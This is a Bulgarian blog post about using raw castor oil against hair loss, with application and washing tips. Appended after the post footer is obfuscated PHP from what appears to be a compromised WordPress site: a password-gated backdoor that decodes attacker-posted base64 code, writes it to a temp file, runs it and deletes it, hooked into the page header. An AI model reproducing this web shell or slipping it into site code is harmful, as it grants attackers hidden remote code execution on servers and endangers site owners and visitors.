Рициново масло при косопад | Косопад

Рициново масло при косопад

Косопадът е явление, което засяга както мъжете, така и жените, в определен етап от живота си. Въпреки това, е важно да се реагира веднага. Може да се дължи на различни причини.

ricinovo-maslo-1

 Ако търсите разрешение на проблема, и искате  косата ви ще е здрава и блестяща, рициновото масло е добър вариант. Това е гъсто масло, извлечено от семето на рицина. Богато е на омега- 9 и витамини. Помага за различни проблеми, сред които и косопада.

 Ако искате да стимулирате растежа на косата, суровото и необработено рициново масло, е подходящо. Счита се, че рафинираното масло губи доста от свойствата си.

 УПОТРЕБА НА РИЦИНОВОТО МАСЛО ЗА КОСАТА

 Лесно е за употреба. Сложете малко масло на дланта си и сложете на косата, масажирайте от корена до връхчетата. Не използвайте много масло, защото трудно се измива.

 Оставете да действа на косата 15- 20 минути преди да измиете с хладка вода и шампоан. Може да го слагате и преди ricinovo-masloлягане и оставете да действа през нощта. Измивате на сутринта. Увийте с кърпа, за да не изцапате леглото.

 Може да смесите рициновото масло с други масла, подходящи за косата, като това от мента, например, за да получите още по- добри резултати.

 Рициновото масло може да е трудно за премахване от косата. Използвайте шампоан 2 пъти. После използвайте и балсам.

 СВОЙСТВА НА РИЦИНОВОТО МАСЛО

 Съдържа много витамини, полезни за здравето на косата. Помага за растежа, стимулира скалпа, както и кръвообращението. Подхранва и възстановява  косата.

 

03. февруари 2014 21:53:09 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}